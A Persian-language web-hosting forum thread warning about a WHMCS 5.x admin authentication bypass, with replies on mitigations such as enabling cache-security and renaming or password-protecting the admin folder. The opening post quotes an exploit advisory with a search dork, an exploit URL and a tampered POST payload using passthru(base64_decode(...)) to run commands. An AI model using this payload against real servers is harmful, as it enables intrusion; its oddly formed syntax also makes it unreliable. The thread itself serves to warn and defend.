صفحه 1 از 2 12 آخرینآخرین
نمایش نتایج: از شماره 1 تا 10 , از مجموع 16

موضوع: مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

Hybrid View

پست قبلی پست قبلی   پست بعدی پست بعدی
  1. #1
    عضو انجمن secure_host آواتار ها
    تاریخ عضویت
    Nov 2008
    نوشته ها
    586
    تشکر تشکر کرده 
    171
    تشکر تشکر شده 
    1,382
    تشکر شده در
    508 پست

    Post مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

    با سلام
    مشکل امنیتی جدیدی در WHCS ورژن 5 وجود دارد که باعث می شود شخص نفوذگر به صفحه ادمین دسترسی پیدا کند.

    راه کار : تا ارایه Patch از ناحیه WHMCS می توانید قابلیت cache-security را در WHMCS خود فعال نمایید . گفتنی است که امکان cache-security به صورت پیش فرض بر روی whmcs 5.1 فعال می باشد.
    اطلاعات تکمیلی :
    WHMCS 5.x Authentication Bypass - CXSecurity WLB
    WHMCS 5.x versions suffers from a cookie-validation vulnerability, where sessions can be modified and authentication can
    be easily bypassed.

    ##################################################
    # Description : WHMCS 5.x Authentication Bypass Vulnerability
    # Author : Agd_Scorp
    # Contact: vorscorp@hotmail.com
    # Version : 5.x
    # Link : Order Now - WHMCS
    # Date : Monday, December 31, 2012
    # Dork : intext:Powered by WHMCompleteSolution
    ##################################################

    Recommended: You must have BEeF or Tamper Data already installed, I do not recommend doing this process manually.

    # The Fact:

    WHMCS
    5.0 is completely vulnerable to this vulenrability, but in 5.1 version,
    WHMCS has added extra cache-security, so I've added an extra-payload
    for it, you can do the exploitation-process without the payload in the
    5.0 version.


    # The Exploitation

    http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}

    after
    you have successfully entered that into your browser, the page will lag
    for abit due to the cache-validation, which we, ofcourse, will change
    it. ;-)


    when the page is loading, quickly open Tamper Data and change the loading POST_SESSION request & the payload to
    this:

    POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";

    Payload: $payload = "login=1&title=1&execorder=0&hook=urlencoded&redir ect={admin_index}";


    # The Result

    Once
    you have done this process, you will be automatically be redirected to
    the admin page, although, if the administrator has enabled
    cache-security, this process will fail.

    # Solution & Fix

    No solution & fix, just wait for the WHMCS team to release a patch for this vulnerability.
    ارایه دهنده خدمات ایمن سازی سرور های مبتنی بر لینوکس و ویندوز
    My Crime Is My Advisory . Hacking Is The Best But Security Is The First

    The Best Secure Hosting in Iran http://SecureHost.ir

    جهت تماس در شبکه IRC :mHUB.HIRCNetwork.com#Linux@Secure_Host

  2. تعداد تشکر ها ازsecure_host به دلیل پست مفید


  3. #2
    کاربر اخراج شده
    تاریخ عضویت
    Sep 2012
    محل سکونت
    ×
    نوشته ها
    460
    تشکر تشکر کرده 
    134
    تشکر تشکر شده 
    1,790
    تشکر شده در
    1,293 پست

    پیش فرض پاسخ : مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

    تشکر ولی چرا ایمیلی ارسال نشده؟

  4. تعداد تشکر ها از i-whost به دلیل پست مفید


  5. #3
    کاربر اخراج شده
    تاریخ عضویت
    Jun 2012
    نوشته ها
    195
    تشکر تشکر کرده 
    13
    تشکر تشکر شده 
    270
    تشکر شده در
    195 پست

    پیش فرض پاسخ : مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

    سلام
    بهترین کار اینه که هم با پنل پوشه ادمین رو روش رمز بزاریم و اسم پوشه هم عوض کنیم.با تشکر

  6. تعداد تشکر ها از kambizmabdi به دلیل پست مفید


  7. #4
    عضو دائم Ashkankamangar.ir آواتار ها
    تاریخ عضویت
    Jun 2010
    محل سکونت
    wien , Österreich
    نوشته ها
    1,341
    تشکر تشکر کرده 
    1,509
    تشکر تشکر شده 
    4,086
    تشکر شده در
    2,328 پست

    پیش فرض پاسخ : مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

    سلام عذر میخوام با توجه به نوع بایپس آیا در صورت تغیییر نام پوشه ی ادمین و گذاشتن رمز بر روی پوشه ی ادمین باز این خطر وجود دارد؟

  8. تعداد تشکر ها از Ashkankamangar.ir به دلیل پست مفید


  9. #5
    عضو انجمن CityKala.net آواتار ها
    تاریخ عضویت
    Sep 2011
    محل سکونت
    ایالات متحده تهران
    نوشته ها
    777
    تشکر تشکر کرده 
    215
    تشکر تشکر شده 
    1,171
    تشکر شده در
    880 پست

    پیش فرض پاسخ : مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

    نقل قول نوشته اصلی توسط Ashkankamangar.ir نمایش پست ها
    سلام عذر میخوام با توجه به نوع بایپس آیا در صورت تغیییر نام پوشه ی ادمین و گذاشتن رمز بر روی پوشه ی ادمین باز این خطر وجود دارد؟
    با سلام
    فکر نمیکنم احتمالا روی پوشه اجرا میکنند!
    اما باز هم یک باز دیگه اسم رو عوض کنید! و رمز جدید بذارید
    کار از محکم کاری عیب نمیکند!
    ما که تحویل اتوماتیک هم کلا نسلش رو ورداشتیم!
    فناوری اطلاعات پاسارگاد 74-88558318
    خیابان قائم مقام فراهانی، خیابان عرفان، شماره 9
    (ملاقات با هماهنگی)
    (فعالیت مجدد بزودی)

  10. تعداد تشکر ها ازCityKala.net به دلیل پست مفید


  11. #6
    عضو انجمن secure_host آواتار ها
    تاریخ عضویت
    Nov 2008
    نوشته ها
    586
    تشکر تشکر کرده 
    171
    تشکر تشکر شده 
    1,382
    تشکر شده در
    508 پست

    پیش فرض پاسخ : مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

    نقل قول نوشته اصلی توسط i-whost نمایش پست ها
    تشکر ولی چرا ایمیلی ارسال نشده؟
    باید من پاسخ گو باشم ؟

    نقل قول نوشته اصلی توسط Ashkankamangar.ir نمایش پست ها
    سلام عذر میخوام با توجه به نوع بایپس آیا در صورت تغیییر نام پوشه ی ادمین و گذاشتن رمز بر روی پوشه ی ادمین باز این خطر وجود دارد؟
    سلام .خیر
    ارایه دهنده خدمات ایمن سازی سرور های مبتنی بر لینوکس و ویندوز
    My Crime Is My Advisory . Hacking Is The Best But Security Is The First

    The Best Secure Hosting in Iran http://SecureHost.ir

    جهت تماس در شبکه IRC :mHUB.HIRCNetwork.com#Linux@Secure_Host

  12. تعداد تشکر ها ازsecure_host به دلیل پست مفید


  13. #7
    عضو دائم RoobinaServer آواتار ها
    تاریخ عضویت
    Mar 2012
    محل سکونت
    Tehran | تلگرام : @rbserver | کانال تلگرام : @roobinaserver
    نوشته ها
    2,600
    تشکر تشکر کرده 
    438
    تشکر تشکر شده 
    7,427
    تشکر شده در
    5,196 پست

    پیش فرض پاسخ : مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

    نقل قول نوشته اصلی توسط Ashkankamangar.ir نمایش پست ها
    سلام عذر میخوام با توجه به نوع بایپس آیا در صورت تغیییر نام پوشه ی ادمین و گذاشتن رمز بر روی پوشه ی ادمین باز این خطر وجود دارد؟

    سلام

    اشکان عزیز من چند بار تست کردم رمز که بگذارید به مشکل میخوره بعضی قسمت های سیستم فروش همان فقط نام پوشه را عوض کنید.(سیستم آنلاین و ...)

    ارادتمند سجادیه
    یا حق
    ویرایش توسط RoobinaServer : January 5th, 2013 در ساعت 11:20
    میزبان داده پرداز - روبینا سرور - (تلفن و راه های ارتباطی - Roobinaserver.ir)
    پرووایدر خدمات دیتاسنتری در تهران
    از سال 1385 تا کنون


  14. تعداد تشکر ها از RoobinaServer به دلیل پست مفید


  15. #8
    عضو دائم shivahost آواتار ها
    تاریخ عضویت
    Dec 2010
    نوشته ها
    2,477
    تشکر تشکر کرده 
    1,371
    تشکر تشکر شده 
    4,137
    تشکر شده در
    2,773 پست

    پیش فرض پاسخ : مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

    نقل قول نوشته اصلی توسط RoobinaServer نمایش پست ها
    سلام

    اشکان عزیز من چند بار تست کردم رمز که بگذارید به مشکل میخوره بعضی قسمت های سیستم فروش همان فقط نام پوشه را عوض کنید.

    ارادتمند سجادیه
    یا حق
    بیش از یکسال هست رمز گذاشتیم و هیچ مشکلی ندیدم....

  16. #9
    عضو دائم RoobinaServer آواتار ها
    تاریخ عضویت
    Mar 2012
    محل سکونت
    Tehran | تلگرام : @rbserver | کانال تلگرام : @roobinaserver
    نوشته ها
    2,600
    تشکر تشکر کرده 
    438
    تشکر تشکر شده 
    7,427
    تشکر شده در
    5,196 پست

    پیش فرض پاسخ : مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

    نقل قول نوشته اصلی توسط shivahost نمایش پست ها
    بیش از یکسال هست رمز گذاشتیم و هیچ مشکلی ندیدم....
    نقل قول نوشته اصلی توسط Ashkankamangar.ir نمایش پست ها
    سلام ادمین من الان دو ساله رمز داره و مشکلی نداره تغییر نام هم همین طور
    بله انشالله که مشکل نخورید سیستم ما که مشکل میخوره (بر اساس ماژول ها و کانفیگی که داریم به پوشه ادمین نیاز داره) و موارد امنیتی دیگری قرار دادیم


    یا حق
    میزبان داده پرداز - روبینا سرور - (تلفن و راه های ارتباطی - Roobinaserver.ir)
    پرووایدر خدمات دیتاسنتری در تهران
    از سال 1385 تا کنون


  17. تعداد تشکر ها از RoobinaServer به دلیل پست مفید


  18. #10
    عضو دائم Ashkankamangar.ir آواتار ها
    تاریخ عضویت
    Jun 2010
    محل سکونت
    wien , Österreich
    نوشته ها
    1,341
    تشکر تشکر کرده 
    1,509
    تشکر تشکر شده 
    4,086
    تشکر شده در
    2,328 پست

    پیش فرض پاسخ : مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

    نقل قول نوشته اصلی توسط RoobinaServer نمایش پست ها
    سلام

    اشکان عزیز من چند بار تست کردم رمز که بگذارید به مشکل میخوره بعضی قسمت های سیستم فروش همان فقط نام پوشه را عوض کنید.(سیستم آنلاین و ...)

    ارادتمند سجادیه
    یا حق
    سلام ادمین من الان دو ساله رمز داره و مشکلی نداره تغییر نام هم همین طور

صفحه 1 از 2 12 آخرینآخرین

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. آپدیت به نسخه جدید و تنظیمات امنیتی whmcs
    توسط aminh03 در انجمن سوالات و مشکلات
    پاسخ ها: 1
    آخرين نوشته: July 2nd, 2017, 19:24
  2. پاسخ ها: 3
    آخرين نوشته: April 4th, 2014, 14:31
  3. اپدیت امنیتی whmcs
    توسط mhiizadi در انجمن مباحث و منابع آموزش
    پاسخ ها: 1
    آخرين نوشته: March 25th, 2014, 17:04
  4. پاسخ ها: 9
    آخرين نوشته: May 18th, 2013, 08:45
  5. پاسخ ها: 27
    آخرين نوشته: April 26th, 2013, 20:02

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •